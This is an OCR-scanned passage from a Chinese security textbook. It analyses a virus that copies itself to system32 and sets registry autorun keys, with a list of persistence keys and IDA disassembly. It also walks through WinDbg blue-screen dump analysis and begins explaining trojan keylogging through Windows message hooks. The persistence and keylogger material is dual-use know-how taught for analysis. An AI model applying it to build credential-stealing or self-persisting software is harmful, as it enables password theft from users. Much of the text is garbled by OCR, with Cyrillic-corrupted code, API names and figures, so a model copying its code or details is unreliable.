类 型 为 字符 串 / 双 字 的 缓冲 区 的 大 小 。 

有 关注 册 表 的 最 后 一 个 函数 RegCloseKey 则 非常 简单 。 


LONG RegCloseKey ( 
НКЕУ ҺКеу 
// 设 置 为 之 前 由 RegCreateKeyEx 返 回 的 参数 phkResult, 这 里 设置 为 hKey 

); 

该 病毒 最 后 一 个 功能 就 是 将 自身 复制 进入 系统 目录 ， 通 过 修改 注册 表 HKEY _ 
CURRENT USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\Windows， 修 改 load 键 
值 进行 开机 目 局 。 通 过 修改 注册 表 进 行 自 局 的 方法 还 有 以 下 几 种 : 

HKEY LOCAL MACHINE\software\Microsoft\WindowsNT\CurrentVersion\Winlogon\ 
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Сы ня) 目标 程序 。 
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HKEY CURRENT USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ 


Run 


HKEY LOCAL MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer 


\Run 


HKEY CURRENT USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce 
HKEY CURRENT USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup 
HKEY LOCAL MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup 
HKEY LOCAL MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce 
HKEY CURRENT USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 

HKEY LOCAL MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx 


(Windows XP) 


HKEY CURRENT USER\Software\Microsoft\Windows\CurrentVersion\Run 

HKEY LOCAL MACHINE\Software\Microsoft\Windows\CurrentVersion\Run 

HKEY CURRENT USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon 

HKEY LOCAL MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon 

вас КИН) ЖА” 1, EITA EPA regedit, 35 |НЕКҮ CURRENT USERN 
Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows 可 知 “33.exe” 被 复制 到 系统 目录 
ѕуѕіет32 F 〈 见 图 9-38) ， 并 且 通 过 修改 load 键 值 ， 进 行 目 局 ， 如 图 9-$9 所 示 。 


са Internet Connection W 
B-E) Internet Explorer 
а (2 Keyboard 
B-E MediaPlayer 
MessengerSeryice 
H-O] Microsoft Management 
由 Са Multimedia 
ы (20 Не ШЕ 
2 HetShow 
Са Notepad 
C Ftbaclup 
= Са Dutlook Express 
= (J Plus! 
= са Рго ес ед Storage 5уз 
(СО ЕАЗ Phonsbook 
由 -的 кегЕаїз2 
[ 1] SAPI Layer 
# Са Schedule+ 
B- Search Assistant 
Са Security Center 
E Speech 
= Са SystemCertificates 
B-E Windows 
Са Windows Help 
B-E Windows Media 
= са Windows НТ 
5-23 CurrentVersion 
Са Devi 
СД Extensions 
+ Са Hetwork 
Са PrinterPorts 
+ Са Program Manager 
{СД Time Zones 


图 9-58 regedit 


НЕЕ) 


С: \WINDOWS\system32\33. ехе 


С: \WINDOWS\ system32\33. ехе 
Са) 
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SuD 881180 proc near 


Filename= byte ptr -384h 
Buffer= byte ptr -2898h 


esp, 364h 
eax, [esp+364h+Buffer] 
ebx 
esi 
edi 
2988h ; USize 
eax ; lpBuffer 
05: бегбузтетр | кесгогуй 
Ís Offset unk 487 96С 
‚ ВЕЕЕЕЕЕЕЕП 
‚ еах 
‚ Гезр+21 дв+Вогген | 


1, есх 


‚ edi 
‚ есх 
i, edx 
s ВРЕЕЕЕЕЕЕП 


‚ Phx 
96) 


‚ ерх 
» [esp*314h*Filename] 
3 


; lpFilenanme 


8 ; hHodule 

ds :GetModuleFileNanef 

ecx, [esp*318h*Buffer] 

1 ; bFailIFExists 
edx., [esp+314h+Filename] 

есх ; ТрНеш 11еНапте 
edx ; lpExistingFileName 
0$ :CopyFilef 

edi 

esi 

вах, Рах 

ebx 

short loc_10124ñ 


图 9-59 + АНА (1) 
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接 下 来 通过 IDA Pro 图 形 模 式 分 析 该 过 程 。 
进入 Imports 界 面 定位 到 CopyFile， 随 后 使 用 Xref 〈Ctrl+X 组 合 键 ) 跳 转 到 如 图 9-60 所 
示 的 图 形 界面 。 


Теа ecx, [esp+310h+Buffer ] 

push 1 ; bFaillfExists 
1еа edx, [esp+314h+Filename] 

push ecx ; ІрНешҒі1еНапе 


push edx ; lpExistingFileName 
call ds :CopyFileñ 
edi 


pop esi 

test eax, eax 

pop ebx 

j short loc 48121й 


eax, |езр+3041п+ВиЕ Ее | 

еах ; ТрОага 

offset UalueName ; "load" 

offset SubKeu ; "Software\\Microsoft\\Windows НТ\\биккеп"... 
в00808801һ ; hKey 

5ш 8010090 

esp, 10һ 


retn 
sub 801180 endp 


图 9-60 ”注册 表 自 启 ( 2 ) 

首先 ， 程 序 调 用 GetSystemDirectoryA 函 数 ， 通 过 该 图 数 得 出 系统 目录 ， 也 就 是 
system32 的 位 置 所 在 〈 系 统 盘 不 一 定 都 在 C 盘 ) 。 

其 次 ， 使 用 GetModuleFileNameA 函 数 ， 该 函数 的 作用 是 得 到 文件 的 完整 路 笃 ， 联 系 
下 文 紧 接着 调用 CopyFileA 函 数 ， 可 以 得 知 ，GetModuleFileNameA 函 数 的 目的 是 得 到 “33. 
exe” 的 具体 所 在 位 置 ， 然 后 通过 CopyFileA 函 数 复制 进 系统 目录 。 

最 后 ， 通 过 调用 注册 表 函 数 修 改 load 键 值 ， 添 加 “33.exe” 进 行 注册 表 目 后， 如 图 
9-60 所 示 。 

同样 通过 源码 进行 分 析 GetSystemDirectoryA 函 数 。 


UINT МІМАРІ GetSystemDirectory ( 

_out LPTSTR lpBuffer, // 装 载 系统 目录 的 缓冲 区 
_1п UINT uSize // 缓 冲 区 大 小 

); 


使 用 起 来 则 很 简单 ， 也 就 是 先 建立 一 个 数组 用 来 充当 缓冲 区 (char ххх[256]) ， 随 后 
使 用 GetSystemDirectory(xxx,256)， 就 得 到 了 系统 目录 的 路 径 。 


DWORD МІМАРІ GetModuleFlleName ( 
“Іп opt HMODULE hModule, // 模 板 句柄 , 设置 为 NULL 时 返回 该 程序 完整 路 径 
Out LPTSTR lpFilename, / /保存 文件 路 径 缓 冲 区 
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“Іп DWORD nSize // 缓 冲 区 大 小 


); 


为 了 得 到 目 身 的 完整 路 径 ， 第 1 个 参数 需要 设置 为 NULL， 后 两 个 参数 仍然 可 以 通过 
建立 一 个 数组 存放 路 径 ， 如 char sss[256]， 进 而 使 用 GetModuleFileName (NULL, sss, 
256) 。 

得 到 了 系统 目录 和 自身 路 径 之 后 ， 调 用 CopyFile 函 数 将 自身 复制 进 系 统 目 录 。 


BOOL СоруЕі1е ( 


LPCTSTR lpExistingFileName, // 文 件 自 身 路 径 
LPCTSTR lpNewFileName, // 文 件 目的 路 径 
BOOL bFailIfExists // 对 相同 名 称 文件 操作 选项 


); 


第 3 个 参数 bFailIfExists， 布 尔 值 。 设 定 为 TRUE， 表 示 若 文件 已 经 在 目的 路 径 存 在 ， 
则 函数 失效 ， 设 定 为 FALSE， 则 覆盖 目标 文件 。 

HJE, HEW iH CopyFile (sss (病毒 自身 路 径 )，xxx( 系 统 目 录 路 径 )，FLASE)。 

最 后 ， 调 用 注册 表 函 数 修改 键 值 。 

整个 病毒 的 分 析 到 此 结束 ， 病 毒 看 起 来 无 非 也 就 是 各 种 函数 的 “ 连 招 组 合 ” 罢 了 。 病 
毒 并 不 神秘 ， 只 是 需要 人 们 拥有 一 果敢 于 探索 、 无 晨 困 难 的 心 ! 


9.2.6 使 用 WinDbg 进 行 蓝屏 dmp 文 件 分 析 


在 Windows 平 台 下 ，WinDbg 是 一 于 强大 的 用 户 态 和 内 核 态 的 调试 工具 ， 图 9-61 是 32 位 
WinDbg 的 主 界面 。 


#1 WinDbg:6.12.0002.633 X86 
File Еф Мел Debug Window Help 
| @| te [= Е? ВЕ | ғ (n >O | ñ С Еа G) Ez] EJ БЛГ ET 3 Е! Ад | SJ 


图 9-61 32 位 (х86) WinDbg 主 界面 
安装 完成 后 ， 执 行 File 一 Symbol File Path 命 令 ， 在 Symbol File Path 对 话 框 中 设置 
symbol Path 为 SRV*c: \symbol* http://msdl.microsoft.com/download/symbols， 如 图 9-62、 图 
9-63 所 示 ， 其 目的 就 是 下 载 WinDbg 所 需 的 符号 表 到 C 盘 的 sybol 文 件 夹 下 。 
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8.) WinDbg:6.12.0002.633 ХВ6 


File Edit View Debug Window Help 


Open Source File... 

Glose Gurrent Window 

Attach to a Process... 

Open Crash Dump... 

Connect to Remote Session... 
Connect to Remote Stub... 


Save Workspace to File... 


Map Network Drive... 
Disconnect Network Drive... 


Recent Files 
Exit 


9-62 ” 符 表 设置 ( 1) 


Ctr| +O 
СЕРЕ 
Сі +Е 
F6 


Ctrl+D 
Ctrl+R. 


Ctrl+K 


Ctrl+S 
Ctrl+P 
Ctrl+I 


Ctrl+w 


图 9-63 ”符号 表 设 置 ( 2 ) 
从 File 文 件 选 项 〈 见 图 9-64) 中 可 以 看 到 ，WinDbg 可 以 调试 可 执行 文件 、 进 程 、DMP 
文件 ， 接 下 来 将 使 用 WinDbg 在 用 户 态 模式 调试 蓝屏 DMP 文 件 ， 进 而 分 析 造 成 蓝屏 的 原 


因 ， 用 到 的 命令 将 会 相应 地 做 出 解释 。 
使 用 组 合 键 CtrltD 或 者 执行 File 一 Open Crash Dump 命 令 ， 添 加 蓝屏 dmp 文 件 〈 也 可 以 


直接 拖 入 ) 。 弹 出 如 图 9-65 所 示 对 话 框 。 


ЁЛ winDbg:6.12.0002.633 X86 
[Fie Edit View Debug Window Help Save infomation for workspace? 

Open Source File... Ctrl +O 

Close Current Window СЕРЕ [ Dont ask again іп this WinDbg session 

Open Executable... Ctrl +E - 

Attach to a Process... Еб i No | Сапсе! | 


图 9-64 File 菜单 


图 9-65 ”工作 空间 
这 里 选择 No， 不 保留 工作 空间 ， 避 免 与 其 他 将 分 析 的 文件 冲突 。 
我 们 先 来 认识 图 9-66 中 信息 ， 首 先 : 

Microsoft (R) Windows Debugger Version 6.12.0002.633 X86 
Copyright (c) Microsoft Corporation. All rights reserved. 

这 两 句 表 明了 使 用 的 WinDbg 版 本 与 版 权 信息 。 


EXecutable search path is: Windows 7 Kernel Version 7601 


Pack 1) MP (4 ргосз) 


Free x64 


Product: WinNt, suite: TerminalServer SingleUserTS 


Built Бу: 7601.17944.amd64fre.win7spl gdr.120830-0333 


Machine Мате: 


— ДІ — 


| 
Symbol path: 
SRV°c:vsymbol*" http :/ /msdl microsoft com/download/symbols 
йй El 
— be | 
zi воме. | 


х 


( Service 
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ЕҢ Соввапа - Duap C:\Documents and SettingsVadainv 早 面 \112312-21949-01.dap - WinDbg 上 到 


Microsoft (Е) Windows Debugger Version 6.12.0002.633 X86 
Copyriqht (с) Microsoft Corporation. А11 rights reserved. 


Loading Dump File [C:\Documents and бе павзадиа ив m -112312-21949-01.4ар| 
Міні Kernel Dump File: Only registers and stack trace are available 


Windows ? Kernel Version 7601 (Service Pack 1) MP (4 procs) Fres x64 
Product: WinNt, suite: Тегміпа1Ѕегтег SingleUserTS 
Built by: 7601.117944 amdé4fre.vwin?spl_gdr.120830-0333 


Machine Name: 

Kernel base = 0х##{#Е800`04815000 PsLoadedMcduleList = ОхЕЕЕЕЕВ00`04а5#670 
Debug session time: Fri Nov 23 13:44:08.182 2012 (UTC + 8:00) 

System Uptime: 0 days 1:40:29.623 

Loading Kernel Symbols 


Press ctrl-c (cdb, kd, ntsd) ог ctrl-break (windbg) to abort symbol loads that takes too long 
Run |зул noisy before .reload to track down problens loading symbols. 


атаке ане лаат ладая катана асан 
Loading unloaded module list 


29-66 DMP 文件 基础 信息 (1) 

以 上 代码 为 蓝屏 系统 的 基本 信息 ， 从 中 可 以 得 到 系统 的 版 本 为 64 位 的 Windows 7 系 
统 ， 处 理 器 核 数 为 4 (4 procs) 。 

Kernel base 为 内 核 地 址 ，PsLoadedModuleList 为 Windows 加 载 的 所 有 内 核 模块 构成 的 链 
表 的 表 头 。 

从 Debug session time: Еп Хоу 23 13: 44: 08.182 2012 (ОТС + 8: 00) 信息 得 知 系 
统 骨 省 发 生 的 具体 时 间 为 System Uptime: 0 days 1: 40: 29.623， 则 标明 系统 在 蓝屏 溃 前 
的 运行 时 长 。 

如 图 9-67 所 示 ， 从 Probably caused Бу: igdpmd64.sys ( 101ртӣ64+15аа18 ) 得 知 ， 系 
统 朋 尝 的 原因 也 就 是 igdpmd64.sys AMD 显 卡 驱 动 文件 导致 的 。 


ЗЕ ЗЕ ЭЕ зе ЭЕ ЗЕ ЭЕ ЭЕ ЗЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЗЕ ЭЕ ЗЕ ЗЕ ЭЕ ЭЕ ЗЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЗЕ ЗЕ ЗЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЗЕЗЕЗЕЗЕЗЕЗЕЗЕЗЕЗЕЗЕЗЕЗЕЗЕЗЕЗЕЗЕЗЕЗЕ ЗЕ ЭЕ ЭЕ ЭЕ ЗЕ ЗЕ ЗЕ ЭЕ ЗЕ ЗЕ ЗЕ ЗЕ ЗЕ ЭЕ ЗЕ ЗЕ ЗЕ 


Bugcheck Апа1утіз 
E JE JE ЭЕ ЭЕ ЭЕ ЭЕ JE JE ЭЕ ЭЕ ЭЕ ЭЕ JE ЭЕ ЭЕ ЭЕ JE JE JE JE ЭЕ ЭЕ ЭЕ ЭЕ JE ЭЕ ЭЕ ЭЕ ЭЕ JE JE ЭЕ ЭЕ ЭЕ ЭЕ JE JE ЭЕ ЭЕ ЭЕ JE JE JE ЭЕ ЭЕ ЭЕ ЭЕ JE ЭЕ ЭЕ ЭЕ ЭЕ JE JE JE ЭЕ ЭЕ ЭЕ JE JE ЭЕ ЭЕ ЭЕ JE JE JE ЭЕ ЭЕ ЭЕ ЭЕ JE JE ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ F€ 
Use |апаіуге -v to get detailed debugging information. 
BugCheck 50, {fffff8812bc5cb60, 0, ##ЕЕ#Е8800739#а18, 5} 


Unable to load image \SvystemRoot\system32\DRIVERS\1i1gdpmd6b4d .svys, Win32 error 0п2 
*** WARNING: Unable to verify timestamp for 1а9ри464.5уз 
*** ERROR: Module load completed but symbols could not be loaded for igdpmd64.sys 


Could not read faulting driver пәле 
Probably caused by : igdpmd64.sys ( igdpmd64+1Saal8 | 


Followup: MachineOwner 


9-67 ”DMP 文件 基础 信息 ( 2 ) 
而 


Unable to load image NSystemRootNsystem32NDRIVERSNigdpmd64.sys, Win32 
error On2*** WARNING: Unable to verify timestamp for 1дарта64 .5у5 
*** ERROR: Module load completed but symbols could not be loaded for 


igdpmd64.sys 


表示 无 法 找到 加 载 igdpmd64.sys 模 块 的 符号 表 。 
输入 !analyze-v 或 者 单 击 下 男 线 标记 的 命令 可 以 获得 具体 细节 ， 如 图 9-68 所 示 。 
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: kd) lanalvze -y 
其 其 凑 其 其 其 闫 其 其 其 其 关 其 其 其 凑 其 其 其 并 凑 其 其 其 头 其 其 其 其 其 其 其 次 其 其 其 其 关 其 其 其 其 天 其 其 其 其 其 其 其 次 其 其 其 其 飞 其 其 其 其 其 其 其 关 凑 其 其 其 闫 其 其 其 其 其 其 其 其 凑 


Bugcheck Analysis 


ЗЕЕ ЭРЭР ЗЕ ЗРЗЕ ЗЕЕ ЗЕ ЗЕ ЗЕЗЕЗЕ ЗЕ ЭРЗЕЗЕЗЕЗЕЗЕЗЕЗЕЗЕ УЕ 


РАСЕ FAULT ІҢ МОНРАСЕР АВЕА (50) 

[nvalid system memory was referenced. This cannot ре protected by try-except, 
LL must Бе protected Бу а Probe. Typically Ше address 1$ just plain bad ог it 
is pointing at freed memory. 

hrgunents: 


№791: #1###89125с6с550, memory reterenced. 
1742: 0000000000000000, valus Ü = read operation, 1 = write operation. 
‚ #188#88007398а18, II non-zero, the instruction address vhich relerenced the bad memory 
address. 
‚ 0000000000000005, (тезеттед) 


9-68 Bugcheck Analysis ( 1) 
PAGE FAULT IN NONPAGED AREA (50) 
Imvalid system memory was referenced. This cannot be protected by try-except, 
it must be protected by a Ргобе. Typically the address is just plain bad ог it 


15 pointing at freed memory. 


这 段 代 码 为 WinDbg 分 析 蓝 屏 的 原因 : 无 效 系统 内 存 引 用 ， 这 种 错误 不 能 被 try-except 
保护 ， 只 能 通过 Probe 〈 人 硬件 侦 测 手段 ) 来 保护 ， 最 典型 的 原因 是 地 址 引用 错误 ， 或 者 指 
同一 个 已 释放 的 内 存 空间 。 


Arguments: // 监 屏 代 码 
Argl: fffff8812bc5cb60, memory referenced. / /错误 内 存 引 用 


Arg2: 0000000000000000, value 0 = read operation, 1 = write operation. 
// 读 操作 引发 问题 
Arg3: fffff8800739fa18, If non-zero, the instruction address which 


referenced the bad memory address. // 非 0 标明 引用 错误 地 址 
Arg4: 0000000000000005, (reserved ) // 预 留 信息 


软件 Bug 产 生 的 细节 如 图 9-69 所 示 。 


Debugging Details: 


ould not read faulting driver папе 


READ _ ADDRESS: GetPointerFromàddress: unable to read from ##ЕЕЕ80004ас9100 
f f f f f 8812bc5cb60 


МІЛ.ТІНС ІР: 
191рма6 4+15аа18 
ЕЕЕЕЕЗВО" 0739Еа18 8Ь0408 eax, dword ріг [гах+гск] 


М ТНТЕКНАТ СОГЕ: 5 
USTOMER_CRASH_COUNT: 1 

ВЕЕАШТ ВОСКЕТ 10: VISTA ПЕТУЕК ЕАПТТ 
ВИОСНЕСЕ 5ТЕ: 0x50 

PROCESS НАМЕ: csrss.exe 

ПЕКЕНТ ІРОІ: 0 


(19-69 Bugcheck Analysis (2) 
下 面 解释 了 蓝屏 代码 的 具体 原因 : 


Could not read faulting driver name / /无 法 读 出 驱动 名 称 
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READ ADDRESS: GetPointerFromAddress: unable to read from fffff80004ac9100 
fffff8812bc5cb60 // 内 存 读 写 错误 , 对 应 Arg1l 
FAULTING ТР: 
1аарта64+15аа18 
ҒҒҒҒҒ880” 0739Ға18 850408 eax, Чмога ptr [rax+rcx] // 导 致 蓝屏 的 指令 


// 引 发 衣 江 的 用 户 层 程序 


mov 


с5г55.ехе 


РКОСЕ55 МАМЕ: 


图 9-70 存 放 的 是 在 发 生 衣 省 时 寄存 器 存放 的 全 部 信息 。 


КАР_ЕКАМЕ: 


НОТЕ: The trap frame 
Sone register values 
rax=fffff88007dcebé0 
rdx=fffffa800950eb50 
гір-ЕЕЕҒҒЕВ800739Ға18 
г8=0000000000000000 


^11=0000000000000000 
“14-0000000000000000 
10р1=0 пу up 
19ӣЯрмаб 4+0х15аа18: 


ftttt880 0739Ға18 8Ь0408 


does not contain all 


f£ffff880051c49d0 -- {.trap 0xzfffff880051c49d0 ) 


registers. 


may be zeroed or incorrect. 


rbx=0000000000000000 
г=1=0000000000000000 
rsp=fffff830051c4b6D 
r9=fffff880051c4b90 
г12=0000000000000000 
г15=0000000000000000 
еі р1 hz па ро пс 


моту 


esetting default scope 


LAST CONTROL TRANSFER: 


图 9-71、 图 9-72 存 放 的 则 是 SIACK TEXT， 即 栈 信 息 ， 从 其 中 可 以 得 引发 崩溃 的 函数 。 


ЗТАСК ТЕХТ: 
“051с4 868 
“051с4870 
“051с4940 
`051с4Ъ60 
“051с4Ъ68 
“051с4Ъ70 
`051с4Ь78 
“051с4Ъ80 
“051с4Ъ88 
“051с4Ъ90 
“051с4Ъ98 
`051с4Ъа0 
“051с4Ба8 
“051с4ЪБ0 
`051с4ЪЬ8 
`051с4Ъс0 
`051с4Ьс8 
`051с4Ъа0 
“051с4Ь48 
`051с4Ъе0 
`051с4Ъе8 
“051с4ЪЕО 
“051с4ЪЕЗ 
“051с4с00 
“051с4с08 


`048408аЕ : 
`048980ее : 
`0739Еа18 : 
`07551000 
`0950=е550 
`07551000 
“0950еЬ50 
`07551000 
`091#4700 
`04#61298 
`073а1830 
`ОЗЕ7ВЕЕВ : 
`0739Ее4с : 
`03Е78Ее8 : 
`0950еЪ 50 
` 00000000 
`00000001 
“0950еЬ50 
`051с4сЬ8 
`08#791а8 
`08Е79608 
`00000000 
`07551000 
`00000000 
“0950еЬ50 


rcx=0000000123e8e000 
rdi=0000000000000000 
rbp=fffffa8007452040 
г10=0000000000000001 
г13-0000000000000000 


9-70 “寄存 器 


`051с49а0 
`с0000001 
`0950еЬ50 
`07551000 
“09144700 
“04161298 
`073а1830 
`ОЗЕ7ВЕЕВ 


`0739е4с : 


`08#78їе8 
` 0950еЬ50 
` 00000000 
` 00000001 
`0950eb50 
`051с4сЬ8 
`08Е791а8 
`08Е79608 
`00000000 
`07551000 
`00000000 
`0950eb50 
“00000000 
` 00000000 
` 00000000 
` 00000000 


: nt! 


“051с4с10 
“051с4с18 


00000119 
00000000” 


00000000 
00000000 


`00000000 
00000000 ` 


00000000 


from ЕЕ ЕЕ 800048408аЕ to ЕЕЕЕЕЗОО04899ЕСО 


nt | KeBugCheckEx 
TT 


199риЯ64+0=15аа18 
ОхЕЕЕЕЕа80` 07551000 
ОЕ ЕЕЕЁа80`0950еЬ50 
ОЕ ЕЕЕЁа80` 07551000 
Oxfffffa80 ` 0950еЬ50 
Oxfffffa80° 07551000 
ОхЕЕЕЕЕВВО` 091#4700 
ОЕ ЕЕЕЁЕа80` 04Е61298 
19Ярмаб 4+0х15с8 30 
Oxftffffa80 ОВЕ?ВЕЕВ 
194риЯ64+0=15ае4с 
ОЕ ЕЕЕЁа80`08Е78Ёе8 
ОЕ ЕЕЁЁа80`0950еь50 
ОЕ ЕЕЕЕВВО 00000000 
ОЕ ЕЕЁЁЕа80` 00000001 
ОЕ ЕЕЕЁЕа80`0950еь50 
ОхЁЁҒҒҒҒВВО` 051с4сЪ8 
ОЕ ЕЕЕЁа80`08Е791а8 
ОЕ ЕЕЕЁа80` 0879608 
Oxfffffa80 00000000 
ОхЁЁЁЁҒҒа80 ` 07551000 
ОхЁЁЁҒҒҒа80 ` 00000000 
ПхЕҒҒҒҒа80” 0950еҺЬ50 
0=119`00000000 


:  ЕНОРОВЕН: : -ігіпа +0ж437с1 
: nt !|KiPageFault+0x16e 


图 9-71 Stck (1) 图 9-72 Stack 节选 (2) 
随后 则 显示 了 引发 蓝屏 的 驱动 信息 ， 包 括 张 动 文件 名 称 、 时 间 戳 等， 如 图 9-73 所 示 。 


FOLLOWUP_HAME: 
МООШ.Е НАМЕ: igdpndé4 
ТМАСЕ НАМЕ: 
рЕВОС ЕІВ ІМАСЕ ТІМЕСТАМР: 
ҒАТІЛПКЕ ВОСКЕТ Ір: Х64 0х50 19ӣрмаб4+15аа18 
ВОСКЕТ ІП: Х64 0х50 19Ярміб4+15аа18 


МасһіпеОтпег 


igdpndé6 4. зуз 
4а8аЗеЬ7 


Followup: MachineOwner 
图 9-73 ”驱动 信息 (1) 
单 击 图 9-73 中 下 男 线 标记 的 igdpmd64 或 者 输入 lmvm igdpmd64， 可 以 得 到 更 为 详细 
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的 驱动 信息 〈 见 图 9-74) 。 


1: КА» lmvm задрм464 
star n module name 
ЕЕЕЕЕЗВО" 07245000 ҒҒҒҒҒ880 ` О7ЯЕБЪСО 1gdpmd64 Т (по symbols) 
Loaded symbol image file: 19йрмӣ64. 595 
Inage path: \SvstemRoot\system32\DRIVERS\igdpmdb 4 .sys 
Timestamp: Sat Маг 26 09:17:43 2011 (4D8D3EB?) 
2 


ImaqeSize: 00BB1BCO 
Translations: 0000.04Ь0 0000.04е4 0409.04Ъ0 0409.04е4 


图 9-74 ”驱动 信息 (2) 
图 9-74 中 列 出 了 驱动 文件 加 载 的 地 址 、 路 径 、 编 译 运行 的 时 间 戳 及 大 小 等 信息 。 
至 此 ， 本 次 使 用 WinDbg 蓝 屏 分 析 就 结束 了 。 除 软件 冲突 以 外 ， 有 些 病毒 也 会 引起 系 
统 骨 演 ， 造 成 蓝屏 现象 。 在 C:\Windows\Minidump 文 件 夹 下 可 以 找到 相应 DMP 文 件 ， 或 
者 找到 C: \Windows\Memory.dmp 路 径 下 的 文件 ， 随 后 使 用 WinDbg 进 行 分 析 ， 找 到 病毒 相 
天 程序 。 病 毒 引 起 系统 裔 溃 的 原因 ， 可 能 是 其 对 内 核 进行 了 修改 操作 ， 也 就 是 Rootkit〈 加 
зи, ВИЖ. ЕЕ). 


9.3 Зап НД H TE rZ 


本 节 介绍 病毒 的 其 他 常用 手段 及 技术 ， 从 源 代码 方面 透彻 地 分 析 病毒 种 种 神秘 的 功能 。 


9.3.1 键盘 记录 技术 


木马 病毒 的 盗号 功能 往往 利用 键盘 记录 技术 进行 ， 主 流 技术 就 是 利用 HOOK， 也 惑 是 
钩子 《Windows 消 息 处 理 机 制 的 监视 点 ) ， 链 式 结构 ， 进 行 账号 密码 的 截获 。 截 获 方式 分 
为 全 局 消息 钩子 《截获 系统 中 所 有 进程 的 按键 消息 ) ， 局 部 消息 钩子 《只 能 记录 特定 程序 
当前 线程 的 按键 消息 ) 。 


1. 局 部 钩子 
首先 先 来 了 解 一 下 什么 是 局 部 消息 钧 子 ， 局 部 消 恩 钧 子 使 用 过 程 分 为 以 下 三 个 步 又 : 
(1) 安装 钩子 。 


SetWindowsHookEx 是 用 来 安装 钩子 的 函数， 其 函数 原型 如 下 。 


ННООК МТМАРТ SetWindowsHookEx ( 


Іп int idHook, / /#J f 2838 

„Та НООКРВОС lpfn, // 回 调 函 数 地 址 

“Іп НТМЗТАМСЕ hMod, // 钩 子 指向 的 模板 句柄 
“Іп DWORD амтьгеаата // 安 装 钩子 的 线程 ID 


|. 


# 1⁄2 аноок Н T iX 7 ЭК НІНЕ ЖЮ, 主要 使 用 有 WH _ 
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CALLWNDPROC (使 用 SendMessage 发 送 消 息 衣 安装 钩子 ) ~ WH САПЛУКОРКОСКЕТ 

(使 用 SendMessage 发 送 消息 后 安装 钩子 ) 、WH СЕТМЕЅЅАСЕ (调用 PeekMessage 或 者 
SendMessage 后 安装 钩子 ) 、WH KEYBOARD (截获 WM KEYUP 或 WM KEYDOWN 时 
安装 钩子 ) УМ MOUSE (截获 鼠标 消息 时 安装 钩 子 ) 。 

第 2 个 参数 jpf 则 会 设置 回调 函数 的 地 址 ， 也 就 是 接 下 来 第 2 步 设 置 的 钩子 回调 函数 的 
地 址 。 

第 3 个 参数 hMod 在 局 部 消息 钩子 中 设置 为 NULL。 

第 4 个 参数 dwThreadId， 指 定 需要 安装 钩子 图 数 的 线程 ID 。 这 里 可 以 先 使 用 
CreateToolhelp32Snapshot 函 数 快 照 得 出 所 有 线程 ID 的 快照 ， 随 后 使 用 Process32First 以 及 
Process32Next 人 遍历 线 程 得 到 指定 程序 (可 以 通过 程序 名 ，“xx.exe”) 的 线程 ID。 也 可 以 
通过 FindWindowEx 找 到 程序 的 窗口 句柄 ， 然 后 通过 GetWindowThreadProcessId 的 返回 值得 
到 线程 ID。 有 目前 很 多 程序 ， 例 如 QQ、YY 等 聊天 工具 均 用 GUI 绘图 制 得 ， 无 法 得 到 其 窗口 
句柄 ， 因 此 第 2 种 方法 失效 。 而 第 一 种 方法 ， 广 泛 流行 的 木马 病毒 并 不 是 针对 单一 程序 进 
行 盗号 ， 因 此 木马 病毒 通常 情况 下 会 使 用 全 局 钧 子 。 


(2) 设置 钩子 函数 
LRESULT CALLBACK НООКххх // 名 称 自 定 义 
( 
int пСойе, / /钩子 目的 代码 
WPARAM wParam, / /发送 或 接受 消息 的 参数 
LPARAM lParam // 发 送 或 接受 消息 的 参数 


) 
{ 


.. // 对 于 各 种 消息 的 处 理 代码 ， 如 将 接收 到 的 消息 通过 CreateFile、WriteFile 保 存在 某 
个 位 置 等 ， 如 监测 键盘 大 小 写 等 。 


return > Са! 1 МехтНоокЕх (....) 
145 ЕЕ, 故 需要 一 个 回调 函数 , 将 信息 从 钩子 间 相 互 传递 
} 


REIMAA ЕСаШхехНоокЕх е ДРАЖЕ ЛЕЙ. 


LRESULT WINAPI Са11МехЕНоокЕх ( 


“Іп оре HHOOK hhk, // 由 安装 钩子 函数 返回 得 到 的 句柄 
Ше, int пСойе, // 同 HOOKxxx (因为 保存 了 要 传递 给 下 一 个 钩子 的 全 部 信 
息 , 所 以 下 面 的 参数 均 与 自身 钩子 函数 一 致 ) 
бав WPARAM wParam, / Ивіноокххх 
In LPARAM lParam / Ивіноокххх 
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(3) ВЖ 
ЖЗНЕ АҚ, Я Кш АЙНА, ЕЕ НЕТ Г 
被 用 户 发 现 的 可 能 性 ， 因 此 需要 和 卸载 钩子 。 


ВООТ МІМАРІ UnhookWindowsHookEx ( 
_In HHOOK hhk // 由 安装 钩子 函数 返回 得 到 的 句柄 
); 


2. = ВА 


下 面 就 将 介绍 全 局 钩子 ， 与 局 部 钩子 不 同 的 是 ， 全 局 钩子 使 用 DLL 文件 加 载 函 数 。 分 
析 全 局 钩子 之 前 ， 先 来 了 解 下 什么 是 DLL。 

DLL (Dynamic Link Library) 即 动态 链接 库 ， 因 为 每 个 程序 的 进程 都 有 上 自己 的 内 存 衬 
间 ， 要 监控 键盘 的 所 有 按键 信息 ， 记 录 键 盘 的 程序 就 需要 加 载 进 入 其 他 程序 的 内 存 空 间 ， 
然后 记录 这 个 程序 使 用 键盘 的 情况 ， 而 DLL 文件 是 可 以 动态 地 加 载 进 其 他 程序 的 内 存 空 
间 ， 从 而 调用 钩子 函数 进行 键盘 记录 ， 故 需要 将 以 上 3 个 步骤 的 函数 放 入 DLL 文件 内 。 


#include <windows.h> 


#1пс1иде ... // 头 文件 

// 在 c 语 言 中 , DLL 的 入 口 函数 为 : 

BOOL АРТЕМТВУ DllMain( HANDLE hModule, / /DLL 模 块 句柄 
DWORD ul reason for call, // 函 数 调用 的 原因 
